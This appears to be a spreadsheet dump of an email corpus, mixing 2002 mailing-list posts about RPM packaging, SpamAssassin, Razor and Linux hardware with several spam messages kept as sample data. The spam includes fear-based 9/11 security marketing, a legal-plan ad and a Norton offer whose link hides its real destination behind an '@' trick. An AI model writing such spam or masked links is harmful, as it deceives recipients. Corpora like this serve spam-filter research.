 &gt; Group:        Networking/Mail
 &gt; License:      Artistic
 &gt; Release:      1
 &gt; 
 &gt; ########################################################################
 &gt; # Sources/Patches
 &gt; ########################################################################
 &gt; Source0: http://spamassassin.org/devel/%{real_name}-%{real_version}.tar.gz
 &gt; 
 &gt; ########################################################################
 &gt; # Build Configuration
 &gt; ########################################################################
 &gt; BuildRoot:          %{_builddir}/%{real_name}-%{real_version}-root
 &gt; BuildArchitectures: i586
 &gt; 
 &gt; ########################################################################
 &gt; # Package Description
 &gt; ########################################################################
 &gt; %description
 &gt;     SpamAssassin provides you with a way to reduce if not completely
 &gt; eliminate
 &gt;     Unsolicited Commercial Email (SPAM) from your incoming email.  It can
 &gt;     be invoked by a MDA such as sendmail or postfix, or can be called from
 &gt;     a procmail script, .forward file, etc.  It uses a genetic-algorithm
 &gt;     evolved scoring system to identify messages which look spammy, then
 &gt;     adds headers to the message so they can be filtered by the user's mail
 &gt;     reading software.  This distribution includes the spamd/spamc components
 &gt;     which create a server that considerably speeds processing of mail.
 &gt; 
 &gt; %prep
 &gt; %setup -q -n %{real_name}-%{real_version}
 &gt; 
 &gt; ########################################################################
 &gt; # Compilation/Installation Instructions (use macros/switches if possible)
 &gt; ########################################################################
 &gt; %build
 &gt;    %{__perl} Makefile.PL LOCAL_RULES_DIR=/etc/spamassassin
 &gt; INSTALLDIRS=vendor PREFIX=%{_prefix}
 &gt;    make OPTIMIZE="$RPM_OPT_FLAGS" PREFIX=%{_prefix}
 &gt; %install
 &gt;    rm -rf $RPM_BUILD_ROOT
 &gt;    %makeinstall PREFIX=%{buildroot}%{_prefix} \
 &gt;                 INSTALLMAN1DIR=%{buildroot}%{_mandir}/man1 \
 &gt;                 INSTALLMAN3DIR=%{buildroot}%{_mandir}/man3 \
 &gt;                 LOCAL_RULES_DIR=%{buildroot}%{_sysconfdir}/spamassassin
 &gt;    install -m 0711 -D spamd/redhat-rc-script.sh
 &gt; %{buildroot}/etc/init.d/spamassassind
 &gt; %clean
 &gt;    rm -rf $RPM_BUILD_ROOT
 &gt; 
 &gt; ########################################################################
 &gt; # RPM file inclusion section (see CRUX guidelines)
 &gt; ########################################################################
 &gt; %files
 &gt; %defattr(-,root,root)
 &gt; %attr(0711,root,root) /etc/init.d/spamassassind
 &gt; %attr(0644,root,root) %config(noreplace) /etc/spamassassin/*
 &gt; %attr(0755,root,root) %dir %{_datadir}/spamassassin
 &gt; %attr(0755,root,root) %{_bindir}/*
 &gt; %attr(0644,root,root) %{_datadir}/spamassassin/*
 &gt; %attr(-,root,root) %{_libdir}/*
 &gt; 
 &gt; ########################################################################
 &gt; # Changelog - Keep it short and simple
 &gt; ########################################################################
 &gt; %changelog
 &gt; * Sun Apr 28 2002 Victor &lt;vkd79@moon.rock&gt;
 &gt; - Initial Release
 &gt; 
 &gt; 
 &gt; _______________________________________________
 &gt; RPM-List mailing list &lt;RPM-List@freshrpms.net&gt;
 &gt; http://lists.freshrpms.net/mailman/listinfo/rpm-list
 -- 
 Chris Kloiber
 _______________________________________________
 RPM-List mailing list &lt;RPM-List@freshrpms.net&gt;
 http://lists.freshrpms.net/mailman/listinfo/rpm-list
</t>
  </si>
  <si>
    <t xml:space="preserve">--------------7736744SOS1
 Content-Type: multipart/alternative;
  boundary="------------744SOS1SOS2"
 --------------744SOS1SOS2
 Content-Type: text/plain; charset=us-ascii
 Content-Transfer-Encoding: 7bit
 To: 
 From: 
 Subject: Hello
 My name is Danny Creech.  I am from Knoxville, TN.  Since September 11th, 2001....People have been trying to get back on their own two feet.  Now is the time to protect your Home, and your Family.  Today, you can receive a Free in Home Family Security System at no Cost to you!!  That's right...
 $0.00..........for Equipment
 $0.00..........for Installation
 Family Protection Fee of $29.99 a month(Covers Police, Fire, Medical, Burglary, &amp; Home Invasion).  Please take advantage of this offer!!  After September 11th.......We don't need Terrorists coming into your homes at all!!
 For more information, please contact Danny Creech at (865-454-5398)
 --------------744SOS1SOS2
 Content-Type: text/html; charset=us-ascii
 Content-Transfer-Encoding: 7bit
 To: 
 From: 
 Subject: Hello
 My name is Danny Creech.  I am from Knoxville, TN.  Since September 11th, 2001....People have been trying to get back on their own two feet.  Now is the time to protect your Home, and your Family.  Today, you can receive a Free in Home Family Security System at no Cost to you!!  That's right...
 $0.00..........for Equipment
 $0.00..........for Installation
 Family Protection Fee of $29.99 a month(Covers Police, Fire, Medical, Burglary, &amp; Home Invasion).  Please take advantage of this offer!!  After September 11th.......We don't need Terrorists coming into your homes at all!!
 For more information, please contact Danny Creech at (865-454-5398)
 --------------744SOS1SOS2--
 --------------7736744SOS1--
</t>
  </si>
  <si>
    <t xml:space="preserve">URL: http://www.newsisfree.com/click/-3,7506698,159/
 Date: 2002-09-04T02:10:04+01:00
 With project budgets in the multiple millions of dollars and virtually no 
 margin for error, more and more development teams are under tremendous pressure 
 to come out on top of the entertainment software market's cutthroat 
 competition. No team manager wants to contemplate dropping the ball when 
 creating the vivid graphics necessary to help make a game a success. Electronic 
 Arts' The Sims franchise is an excellent example of this pressurized situation. 
 This article highlights the critical issues that govern the high volume asset 
 production needed for today's most demanding games.
</t>
  </si>
  <si>
    <t xml:space="preserve">&gt;&gt; I swear to god you have to be so carefull with dell machines 
 &gt;&gt; and linux. 
 ...
 &gt;&gt; to have some cheapo piece of hardware (eth card, modem, 
 &gt;&gt; sound, graphics )
 &gt;&gt; that is incompatable/unsupported. 
 ...
 &gt;&gt; with some crap
 &gt;&gt; dell machine that 
 yes, yes, all terribly insightful and extremely useful information.
 &gt; We just got some new Dell GX260 machines here are work and 
 &gt; I'm supposed to
 &gt; be putting Linux on them. I tried installing RedHat 7.3. It 
 &gt; just didn't want
 &gt; to know about the graphics card. I's an onboard Intel DVMT chip. No
 &gt; dedicated memory, it takes it from the onboard RAM.
 The onboard DVMT card has an Intel 845 G/GL chipset.
 http://www.intel.com/support/graphics/linux/ or
 http://www.intel.com/support/graphics/intel845g/linux.htm has more specific
 information. There is help available there.
 I also found somewhere (not through personal experience though) that
 2.4.19-pre10ac2 includes drivers for the chipset ?
 Steve
 -- 
 Irish Linux Users' Group: ilug@linux.ie
 http://www.linux.ie/mailman/listinfo/ilug for (un)subscription information.
 List maintainer: listmaster@linux.ie
</t>
  </si>
  <si>
    <t xml:space="preserve">It's got to be razor 2.x...I've never installed razor 1.x &lt;G&gt;
 However:
 [mburger@burgers mburger]$ razor-report -v
 Razor Agents 2.14, protocol version 3
 As to more details...I don't have any...it runs, seems to do its thing, 
 and then gives that error.
 On Mon, 12 Aug 2002, Chad Norwood wrote:
 &gt;   Can you send more details about the error?
 &gt;   and also do a 'razor-report -v' to make sure 2.x is being called.
 &gt; 
 &gt;   -chad
 &gt; 
 &gt; On 11/08/02 21:09 -0500, Mike Burger wrote:
 &gt; ) Ok...I need to amend this.
 &gt; ) 
 &gt; ) I don't get the error when I check the spam...just when I go to report it.
 &gt; ) 
 &gt; ) On Sun, 11 Aug 2002, Mike Burger wrote:
 &gt; ) 
 &gt; ) &gt; I did...unfortunately, now I get this:
 &gt; ) &gt; 
 &gt; ) &gt; Died at /usr/bin/razor-check line 32, &lt;GEN0&gt; line 1.
 &gt; ) &gt; 
 &gt; ) &gt; Did I need to remove and reinstall, or something.  I just did a make 
 &gt; ) &gt; install over the existing installation.
 &gt; ) &gt; 
 &gt; ) &gt; On Sun, 11 Aug 2002, Vipul Ved Prakash wrote:
 &gt; ) &gt; 
 &gt; ) &gt; &gt; On Sun, Aug 11, 2002 at 07:39:41AM -0500, Mike Burger wrote:
 &gt; ) &gt; &gt; &gt; 
 &gt; ) &gt; &gt; &gt; Any ideas what might have changed, here? I'm running razor-agents-2.12, 
 &gt; ) &gt; &gt; &gt; and razor-agents-sdk-2.0.3.
 &gt; ) &gt; &gt; 
 &gt; ) &gt; &gt; Mike, 
 &gt; ) &gt; &gt; 
 &gt; ) &gt; &gt; Please upgrade to 2.14 as many bugs were fixed between the two releases, and 
 &gt; ) &gt; &gt; see if your problem persists.
 &gt; ) &gt; &gt; 
 &gt; ) &gt; &gt; cheers,
 &gt; ) &gt; &gt; vipul.
 &gt; ) &gt; &gt; 
 &gt; ) &gt; &gt; 
 &gt; ) &gt; 
 &gt; ) &gt; 
 &gt; ) &gt; 
 &gt; ) &gt; -------------------------------------------------------
 &gt; ) &gt; This sf.net email is sponsored by:ThinkGeek
 &gt; ) &gt; Welcome to geek heaven.
 &gt; ) &gt; http://thinkgeek.com/sf
 &gt; ) &gt; _______________________________________________
 &gt; ) &gt; Razor-users mailing list
 &gt; ) &gt; Razor-users@lists.sourceforge.net
 &gt; ) &gt; https://lists.sourceforge.net/lists/listinfo/razor-users
 &gt; ) &gt; 
 &gt; ) 
 &gt; ) 
 &gt; ) 
 &gt; ) -------------------------------------------------------
 &gt; ) This sf.net email is sponsored by:ThinkGeek
 &gt; ) Welcome to geek heaven.
 &gt; ) http://thinkgeek.com/sf
 &gt; ) _______________________________________________
 &gt; ) Razor-users mailing list
 &gt; ) Razor-users@lists.sourceforge.net
 &gt; ) https://lists.sourceforge.net/lists/listinfo/razor-users
 &gt;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</si>
  <si>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Outsourcing Reality: Integrating a Commercial Physics Engine
</t>
  </si>
  <si>
    <t xml:space="preserve">URL: http://www.newsisfree.com/click/-0,8613670,159/
 Date: 2002-10-06T18:12:50+01:00
 As game developers reach for new forms of gameplay and a better process for 
 implementing established genres, the wisdom of licensing physics engines is 
 becoming inescapable. Physics engines do more than just knock over boxes, 
 however, and the interface between your game and a physics engine must be 
 fairly complex in order to harness advanced functionality.
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Re: [Razor-users] razor-cache ?
</t>
  </si>
  <si>
    <t xml:space="preserve">Good day, zenn,
 On Fri, 2 Aug 2002, zenn wrote:
 &gt; as I see it, there is a valid need for a "razor-cache" server that is
 &gt; available to the local smtp host...
 &gt; recursiveness would also be a nice feature, giving us the option to link
 &gt; caches to offload the burden on the razor servers...
 &gt; it could also allow us to setup local razor caches for private networks that
 &gt; can bypass the razor servers all together...
 &gt; any commensts ?
 	http://www.stearns.org/razor-caching-proxy/ is what you're looking 
 for for the razor1 protocol.  The equivalent for razor2 is on hold pending 
 documentation of the razor2 protocol.
 	Jordan, is that still in the "finishing touches" stage?  *smile*  
 I'm betting that the infinite demands of getting a startup going put it on 
 the back burner.  Please let me know if I can help; if you need someone to 
 check it over, I'd be glad to do that.
 	Cheers,
 	- Bill
 ---------------------------------------------------------------------------
 	"Power concedes nothing without a demand. It never did, and it
 never will.  Find out just what people will submit to, and you have
 found out the exact amount of injustice and wrong which will be imposed
 upon them; and these will continue until they are resisted with either
 words or blows, or with both.  The limits of tyrants are prescribed by
 the endurance of those whom they oppress."
 	-- Frederick Douglass, August 4, 1857
 (Courtesy of Eric S. Raymond)
 --------------------------------------------------------------------------
 William Stearns (wstearns@pobox.com).  Mason, Buildkernel, named2hosts, 
 and ipfwadm2ipchains are at:                        http://www.stearns.org
 --------------------------------------------------------------------------
 -------------------------------------------------------
 This sf.net email is sponsored by:ThinkGeek
 Welcome to geek heaven.
 http://thinkgeek.com/sf
 _______________________________________________
 Razor-users mailing list
 Razor-users@lists.sourceforge.net
 https://lists.sourceforge.net/lists/listinfo/razor-users
</t>
  </si>
  <si>
    <t xml:space="preserve">Elias Sinderson &lt;elias@cse.ucsc.edu&gt; writes:
 &gt; Sorry, Karl, your confusing things.
 No, it's just a silly discussion, but that's what picky semantic
 discussions turn into :)
 &gt; Thos is saying that selective 
 &gt; breeding should be counted as genetic engineering, whereas you are 
 &gt; extending his definition to include the attration that your parents felt...
 Yes, I'm saying that if he extends "genetic engineering" to include
 selecting animals to breed, he must extend it to include selecting
 people to breed with.
 &gt; Unless your parents were selectively bred like livestock to produce you, 
 &gt; I don't think you can make that case...  :-)
 I'm saying that my parents selected each other, and that they did so
 because (among other reasons) each wanted the other's genes to be
 mixed with their own in the offspring that they were planning.
 What does it matter that they were selecting to produce their own
 offspring, rather than the offspring of two unrelated animals?
 -- 
 Karl Anderson      kra@monkey.org           http://www.monkey.org/~kra/
 http://xent.com/mailman/listinfo/fork
</t>
  </si>
  <si>
    <t xml:space="preserve">reminds me of Cheney during the VP debates, when he declared his wealth was
 not the product of government favors.
 http://www.ibiblio.org/pub/academic/communications/logs/Gulf-War/desert-stor
 m/07
 (good time to refresh our memories re iraq . . .)
 starting a debate on govt. contracts,
 gg
 -----Original Message-----
 From: fork-admin@xent.com [mailto:fork-admin@xent.com]On Behalf Of Owen
 Byrne
 Sent: Sunday, September 22, 2002 11:04 AM
 To: Owen Byrne
 Cc: Gary Lawrence Murphy; Mr. FoRK; fork@spamassassin.taint.org; Digital Bearer
 Settlement List
 Subject: Re: sed /s/United States/Roman Empire/g
 Owen Byrne wrote:
 &gt; R. A. Hettinga wrote:
 &gt;
 &gt;&gt; -----BEGIN PGP SIGNED MESSAGE-----
 &gt;&gt; Hash: SHA1
 &gt;&gt;
 &gt;&gt; At 10:32 AM -0400 on 9/21/02, Gary Lawrence Murphy wrote:
 &gt;&gt;
 &gt;&gt;
 &gt;&gt;
 &gt;&gt;
 &gt;&gt;&gt; Cool --- I wasn't aware that the US had lifted it's population out
 &gt;&gt;&gt; of poverty! When did this happen? I wonder where the media gets the
 &gt;&gt;&gt; idea that the wealth gap is widening and deepening...
 &gt;&gt;&gt;
 &gt;&gt;
 &gt;&gt;
 &gt;&gt; All the world loves a smartass...
 &gt;&gt;
 &gt;&gt; :-).
 &gt;&gt;
 &gt;&gt; Seriously. Look at he life expectancy and human carrying capacity of
 &gt;&gt; this continent before the Europeans got here. Look at it now. Even
 &gt;&gt; for descendants of the original inhabitants. Even for the descendents
 &gt;&gt; of slaves, who were brought here by force.
 &gt;&gt;
 &gt;&gt; More stuff, cheaper. That's progress.
 &gt;&gt;
 &gt;&gt; Poverty, of course, is not relative. It's absolute. Disparity in
 &gt;&gt; wealth has nothing to do with it.
 &gt;&gt;
 &gt;&gt; It's like saying that groups have rights, when, in truth, only
 &gt;&gt; individuals do. Like group rights, "disparity" in wealth is
 &gt;&gt; statistical sophistry.
 &gt;&gt;
 &gt;&gt;
 &gt;&gt; Besides, even if you can't help the distribution, industrial wealth
 &gt;&gt; is almost always transitory, and so is relative poverty, even when
 &gt;&gt; there are no confiscatory death-taxes. The 20th anniversary Forbes
 &gt;&gt; 400 just came out, and only a few tens of people are still there
 &gt;&gt; since 1982, a time which had significantly higher marginal taxes on
 &gt;&gt; wealth, income, and inheritance than we do now. More to the point,
 &gt;&gt; they're nowhere near the top.
 &gt;&gt;
 &gt;&gt;
 Lovely quote from the Forbes 400 list:
 "and not a single Astor, Vanderbilt or Morgan rates a mention on the
 current Forbes Four Hundred. "
 But you have to studiously ignore the 4 Rockefellers, 3 Gettys, 3
 Hearsts,  Fords, Kelloggs, Wrigleys,
 and so on.
 There are more self-made people on the list than I previously alluded to
 - I made a mistake. Most
 of them seem to have Ivy League educations, or are Ivy League dropouts,
 suggesting to me that they weren't
 exactly poor to start with. Some of them have lovely self-made stories
 like:
 #347, Johnston, Summerfield K Jr
 track this personTrack This Person
 &lt;http://www.forbes.com/peopletracker/add_person.jhtml?successURL=%2Fpeopletr
 acker%2Fprotected%2Frich_tracker.jhtml&amp;errorURL=%2Fpeopletracker%2Ferror.jht
 ml&amp;personId=221899&gt;
  | See all Bacon Makers
 &lt;http://www.forbes.com/lists/results.jhtml?passListId=54&amp;passYear=2002&amp;passL
 istType=Person&amp;resultsStart=1&amp;resultsHowMany=25&amp;resultsSortProperties=%2Bnum
 berfield1%2C%2Bstringfield1&amp;resultsSortCategoryName=rank&amp;searchParameter1=10
 Str%7C%7CPatCS%7C%7CBacon+Makers&amp;category1=Magazine+Section&amp;category2=catego
 ry&amp;searchParameter2=unset&gt;
 70 , self made
 *Source: Food
 &lt;http://www.forbes.com/lists/results.jhtml?passListId=54&amp;passYear=2002&amp;passL
 istType=Person&amp;resultsStart=1&amp;resultsHowMany=25&amp;resultsSortProperties=%2Bnum
 berfield1%2C%2Bstringfield1&amp;resultsSortCategoryName=rank&amp;searchParameter1=5S
 tr%7C%7CPatCS%7C%7CFood&amp;category1=Industry&gt;,
 Coca-Cola* (quote
 &lt;http://www.forbes.com/finance/mktguideapps/compinfo/CompanyTearsheet.jhtml?
 tkr=CCE&gt;,
 executives
 &lt;http://www.forbes.com/peopletracker/results.jhtml?startRow=0&amp;name=&amp;ticker=C
 CE&gt;,
 news &lt;http://markets2.forbes.com/rpt/Company_News.asp?Symbol=CCE&gt;)
 Net Worth: *$680 mil* returnee
 Hometown: Chattanooga , TN
 *Marital Status:* married , 5 children
 Grandfather James and partner landed first Coca-Cola bottling franchise
 in 1899. Company passed down 3 generations to Summerfield 1950s. Became
 largest independent Coke bottler. Merged with Coca-Cola Enterprises 1991.
 &lt;javascript:openMap('pol');&gt; &lt;javascript:openMap('dist');&gt;
 (...by a compensation committee)
 Owen
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Re: alsa-driver.spec tweak for homemade kernels ...
</t>
  </si>
  <si>
    <t xml:space="preserve"> &gt;&gt; &gt; Well, I don't really find it consistent at all to use an rpm package
  &gt;&gt; &gt; built against something that wasn't installed through rpm :-/
  &gt;&gt;
  &gt;&gt; Following that reasoning, I've been installing all my custom-built
  &gt;&gt; kernels through rpm recently. I find it annoying, though, that
  &gt;&gt; alsa-kernel, and similar packages, will only build for the currently
  &gt;&gt; running kernel.
  &gt;&gt;
  &gt;&gt; So I've attached a patch to specify an alternate kernel by setting the
  &gt;&gt; "TARGET_KERNEL" environment variable before running rpmbuild. You
  &gt;&gt; still need to have the rpm for the specified kernel installed, but at
  &gt;&gt; least it doesn't have to be currently running. It's kinda hackish, so
  &gt;&gt; if someone has a better way to do this, let me know.
  &gt;
  &gt;That idea looks good although it maybe needs to be tweaked a bit more (what
  &gt;you sent doesn't support packages named "kernel-smp"). I'd also prefer a
  &gt;cleaner way than the env variable, and preferrably not editing the spec...
  &gt;probably "--define 'target 2.4.xx-xx' --with smp". Sound good enough?
  &gt;The BuildRequires on "kernel-source" will also need to be removed because
  &gt;it won't necessarily need to be true, and that does bug me a bit :-/
 	Me and my kernel rpm builds ... this all works along the same idea I have 
 been aiming for, but the freaking RedHat Kernel srpms still have been stump 
 ...
 	If we could get this and the alsa driver stuff working, it would be whole 
 lot easier to try out a newer kernel ... but then the size of these rpms 
 are huge, at least for us n^1 world courties ... ;-{ ...
 	I will keep watching and hoping that somebody comes up with a great working 
 idea ...
 Thanks guys.
 Mailed
 Lee
 _______________________________________________
 RPM-List mailing list &lt;RPM-List@freshrpms.net&gt;
 http://lists.freshrpms.net/mailman/listinfo/rpm-list
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: [scoop] Scoop MS Word .doc file into something that plucker or other Palm app can display?
</t>
  </si>
  <si>
    <t xml:space="preserve">I am wondering whether there's a way that I can use sitescooper and/or plucker
 or some other free utility to convert word documents into something a bit
 more palmos friendly?
 I don't have a Windows machine, so it becomes problematic to convert them;
 I know that if this were not the case, in Word I could save them as some
 other more friendly format.
 -- 
 Tcl'2002 Sept 16, 2002, Vancouver, BC http://www.tcl.tk/community/tcl2002/
 Larry W. Virden &lt;mailto:lvirden@cas.org&gt; &lt;URL: http://www.purl.org/NET/lvirden/&gt;
 Even if explicitly stated to the contrary, nothing in this posting should 
 be construed as representing my employer's opinions.
 -&gt;&lt;-
 -------------------------------------------------------
 This sf.net email is sponsored by:ThinkGeek
 Welcome to geek heaven.
 http://thinkgeek.com/sf
 _______________________________________________
 Sitescooper-talk mailing list
 Sitescooper-talk@lists.sourceforge.net
 https://lists.sourceforge.net/lists/listinfo/sitescooper-talk
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: legal advice
</t>
  </si>
  <si>
    <t xml:space="preserve">*This message was transferred with a trial version of CommuniGate(tm) Pro*
 &lt;html&gt;
 &lt;body&gt;
 &lt;p align="center"&gt;&lt;font face="Comic Sans MS" size="5" color="#800000"&gt;We All
 Need a Good Attorney to Call in Today's Society.&lt;/font&gt;&lt;/p&gt;
 &lt;p&gt;&lt;font face="Comic Sans MS"&gt;Keeping ahead of the legal issues in our life was just simply more than we could
 bear. We needed legal advice and we needed it right away. Unfortunately, being middle class, put us in the wrong income bracket to have such a necessity. Now all of this has changed.&lt;/font&gt;&lt;/p&gt;
 &lt;p&gt;&lt;font face="Comic Sans MS"&gt;&lt;br&gt;
 &lt;font color="#800000" size="4" face="Comic Sans MS"&gt;
 Think about the issues that can suddenly come up in your personal life:&lt;/font&gt;&lt;/font&gt;&lt;/p&gt;
 &lt;ul&gt;
   &lt;li&gt;&lt;font face="Comic Sans MS" color="#000080"&gt;&lt;b&gt;Monday:&lt;/b&gt; The dog bit the mailman - Do you know what to do?&lt;/font&gt;&lt;/li&gt;
   &lt;li&gt;&lt;font face="Comic Sans MS" color="#000080"&gt;&lt;b&gt;Tuesday: &lt;/b&gt; The Building Inspector drops by and announces that the permits on file with their office do not
     allow your garage conversion. "What now," you think to yourself.&lt;/font&gt;&lt;/li&gt;
   &lt;li&gt;&lt;font face="Comic Sans MS" color="#000080"&gt;&lt;b&gt;Wednesday:&lt;/b&gt; You've been considering home-schooling your children for some time. Now your daughter announces that she is being picked on yet again, and simply will not attend another day. What are the legal ramifications of home schooling your children?&lt;/font&gt;&lt;/li&gt;
   &lt;li&gt;&lt;font face="Comic Sans MS" color="#000080"&gt;&lt;b&gt;Thursday:&lt;/b&gt; Speeding Ticket goes to warrant for your 17-year-old son. You haven't a clue how to handle
     it.&amp;nbsp;&lt;/font&gt;&lt;/li&gt;
   &lt;li&gt;&lt;font face="Comic Sans MS" color="#000080"&gt;&lt;b&gt;Friday: &lt;/b&gt; Your ex-spouse has missed another child support payment. . . Who do you call?&lt;/font&gt;&lt;/li&gt;
 &lt;/ul&gt;
 &lt;p&gt;&lt;font face="Comic Sans MS" color="#800000" size="4"&gt;And what about all the other things:&lt;/font&gt;&lt;/p&gt;
 &lt;ul&gt;
   &lt;li&gt;&lt;font face="Comic Sans MS" color="#000080"&gt;Received a Traffic Ticket You Thought Was Unjustified?&lt;/font&gt;&lt;/li&gt;
   &lt;li&gt;&lt;font face="Comic Sans MS" color="#000080"&gt;Paid a Bill You Knew Was Unfair?&lt;/font&gt;&lt;/li&gt;
   &lt;li&gt;&lt;font face="Comic Sans MS" color="#000080"&gt;Lost a Security Deposit?&lt;/font&gt;&lt;/li&gt;
   &lt;li&gt;&lt;font face="Comic Sans MS" color="#000080"&gt;Bought a Home or Purchased A Car?&lt;/font&gt;&lt;/li&gt;
   &lt;li&gt;&lt;font face="Comic Sans MS" color="#000080"&gt;Signed an Employment Contract?&lt;/font&gt;&lt;/li&gt;
   &lt;li&gt;&lt;font face="Comic Sans MS" color="#000080"&gt;Had difficulty collecting an insurance claim?&lt;/font&gt;&lt;/li&gt;
   &lt;li&gt;&lt;font face="Comic Sans MS" color="#000080"&gt;Had Trouble With Your Credit Report?&lt;/font&gt;&lt;/li&gt;
   &lt;li&gt;&lt;font face="Comic Sans MS" color="#000080"&gt;Been Involved in a Landlord or Property Dispute?&lt;/font&gt;&lt;/li&gt;
   &lt;li&gt;&lt;font face="Comic Sans MS" color="#000080"&gt;Been Involved in a separation or divorce?&lt;/font&gt;&lt;/li&gt;
   &lt;li&gt;&lt;font face="Comic Sans MS" color="#000080"&gt;Had to Collect Child Support?&lt;/font&gt;&lt;/li&gt;
   &lt;li&gt;&lt;font face="Comic Sans MS" color="#000080"&gt;Prepared A Will or Wanted To?&lt;/font&gt;&lt;/li&gt;
   &lt;li&gt;&lt;font face="Comic Sans MS" color="#000080"&gt;In your personal life, you need legal representation available to you all the time. But most of us never have it because we can't afford it.&lt;/font&gt;&lt;/li&gt;
 &lt;/ul&gt;
 &lt;p&gt;&lt;font face="Comic Sans MS" size="4"&gt;Now there is a program that not only provides quality legal help,
 &lt;font color="#800000"&gt; but it provides it 24 hours a day&lt;/font&gt;, with an attorney helping you the same day you call them -
 &lt;font color="#800000"&gt; and it is for a small monthly fee&lt;/font&gt;. No Kidding. &lt;font color="#800000"&gt; Somewhere between twenty and forty dollars a month, depending upon the plan you choose.&lt;/font&gt;&lt;/font&gt;&lt;/p&gt;
 &lt;blockquote&gt;
   &lt;p&gt;&lt;font face="Comic Sans MS"&gt;
   &lt;br&gt;
   &lt;font size="4"&gt;
   &lt;a href="http://216.41.185.233/cgi-bin/legal/index.cgi51000"&gt;Click here&lt;/a&gt;
   &lt;p&gt;&amp;nbsp;&lt;/p&gt;
   &lt;p&gt;&lt;font face="Comic Sans MS"&gt;&lt;font size="3"&gt;Not
   interested? Take your em ail out of our data base by visitng the site and following removal instructions &lt;br&gt;
   &lt;/font&gt;&lt;/p&gt;
 &lt;/blockquote&gt;
 &lt;/body&gt;
 &lt;/html&gt;
 126
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Protect Your Computer With Norton Systemworks 2002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</si>
  <si>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&lt;title&gt;Norton System Works &lt;/title&gt;
 &lt;/head&gt;
 &lt;body&gt;
 &lt;table border=3D"1" width=3D"100%" cellspacing=3D"0" cellpadding=3D"0"&gt;
   &lt;tr&gt;
     &lt;td width=3D"100%"&gt;
       &lt;table border=3D"0" width=3D"100%" cellspacing=3D"0" cellpadding=3D"=
 0" bgcolor=3D"#800000"&gt;
         &lt;tr&gt;
           &lt;td width=3D"100%"&gt;
             &lt;p align=3D"center"&gt;&lt;b&gt;&lt;font face=3D"Baskerville Old Face" col=
 or=3D"#ffffff" size=3D"6"&gt;Norton
             System Works&lt;/font&gt;&lt;/b&gt;
           &lt;/td&gt;
         &lt;/tr&gt;
       &lt;/table&gt;
       &lt;table border=3D"0" width=3D"100%" cellspacing=3D"0" cellpadding=3D"=
 0" bgcolor=3D"#FFCC00"&gt;
         &lt;tr&gt;
           &lt;td width=3D"100%"&gt;
             &lt;table cellSpacing=3D"0" cellPadding=3D"0" width=3D"100%" bgCo=
 lor=3D"#800000" border=3D"0"&gt;
               &lt;tbody&gt;
                 &lt;tr&gt;
                   &lt;td width=3D"100%"&gt;
                     &lt;table cellSpacing=3D"0" cellPadding=3D"0" width=3D"10=
 0%" bgColor=3D"#ffcc00" border=3D"0"&gt;
                       &lt;tbody&gt;
                         &lt;tr&gt;
                           &lt;td width=3D"100%"&gt;
                             &lt;p align=3D"center"&gt;&lt;b&gt;&lt;span class=3D"body-tex=
 t"&gt;&lt;font face=3D"Times New Roman" color=3D"#000080" size=3D"4"&gt;A
                             complete problem-solving suite for advanced us=
 ers
                             and small businesses.&lt;/font&gt;&lt;/span&gt;&lt;/b&gt;
                           &lt;/td&gt;
                         &lt;/tr&gt;
                       &lt;/tbody&gt;
                     &lt;/table&gt;
                   &lt;/td&gt;
                 &lt;/tr&gt;
               &lt;/tbody&gt;
             &lt;/table&gt;
           &lt;/td&gt;
         &lt;/tr&gt;
       &lt;/table&gt;
       &lt;table border=3D"0" width=3D"100%"&gt;
         &lt;tr&gt;
           &lt;td width=3D"31%"&gt;
             &lt;p align=3D"center"&gt;&lt;img border=3D"0" src=3D"http://www.usavem=
 ore.net/Images/nortonsystemworks.jpg" width=3D"105" height=3D"133"&gt;&lt;/td&gt;
           &lt;td width=3D"69%"&gt;
             &lt;table border=3D"0" width=3D"100%"&gt;
               &lt;tr&gt;
                 &lt;td width=3D"100%"&gt;
                   &lt;p align=3D"left"&gt;&lt;b&gt;&lt;font face=3D"Times New Roman" colo=
 r=3D"#0000ff" size=3D"4"&gt;Norton
                   System Works Features:&lt;/font&gt;&lt;/b&gt;&lt;/td&gt;
               &lt;/tr&gt;
             &lt;/table&gt;
             &lt;ul&gt;
               &lt;li&gt;&lt;font face=3D"Times New Roman" size=3D"3"&gt;&lt;b&gt;Norton Anti=
 Virus&lt;/b&gt;
                 protects your PC from virus threats&lt;/font&gt;
               &lt;li&gt;&lt;font face=3D"Times New Roman" size=3D"3"&gt;&lt;b&gt;Norton Util=
 ities&lt;/b&gt;
                 optimizes PC performance and solves problems&lt;/font&gt;
               &lt;li&gt;&lt;font face=3D"Times New Roman" size=3D"3"&gt;&lt;b&gt;Norton Clea=
 nSweep&lt;/b&gt;
                 cleans out Internet clutter&lt;/font&gt;
               &lt;li&gt;&lt;font face=3D"Times New Roman" size=3D"3"&gt;&lt;b&gt;GoBack&lt;/b&gt; =
 by Roxio
                 provides quick and easy system recovery&lt;/font&gt;
               &lt;li&gt;&lt;font face=3D"Times New Roman" size=3D"3"&gt;&lt;b&gt;Norton Ghos=
 t&lt;/b&gt;
                 clones and upgrades your system easily&lt;/font&gt;
               &lt;li&gt;&lt;font face=3D"Times New Roman" size=3D"3"&gt;&lt;b&gt;WinFax&lt;/b&gt; =
 &lt;b&gt;Basic&lt;/b&gt;
                 sends and receives professional-looking faxes&lt;/font&gt;&lt;/li&gt;
             &lt;/ul&gt;
           &lt;/td&gt;
         &lt;/tr&gt;
       &lt;/table&gt;
       &lt;table border=3D"0" width=3D"100%"&gt;
         &lt;tr&gt;
           &lt;td width=3D"100%"&gt;
             &lt;p align=3D"center"&gt;&lt;b&gt;&lt;font face=3D"Britannic Bold" color=3D"=
 #0000ff" size=3D"5"&gt;&lt;a href=3D"http://abel.math.umu.sea636149key=3D9658952=
 1061636149index=3DA21r7P6qW61636149.2895625@www.usavemore.net"&gt;Order
             Today&lt;/a&gt;&lt;/font&gt;&lt;/b&gt;&lt;/td&gt;
         &lt;/tr&gt;
         &lt;tr&gt;
           &lt;td width=3D"100%"&gt;
             &lt;p align=3D"center"&gt;&lt;b&gt;&lt;font face=3D"Times New Roman" size=3D"=
 5"&gt;$300.00 +
             Value&lt;/font&gt;&lt;/b&gt;&lt;/td&gt;
         &lt;/tr&gt;
       &lt;/table&gt;
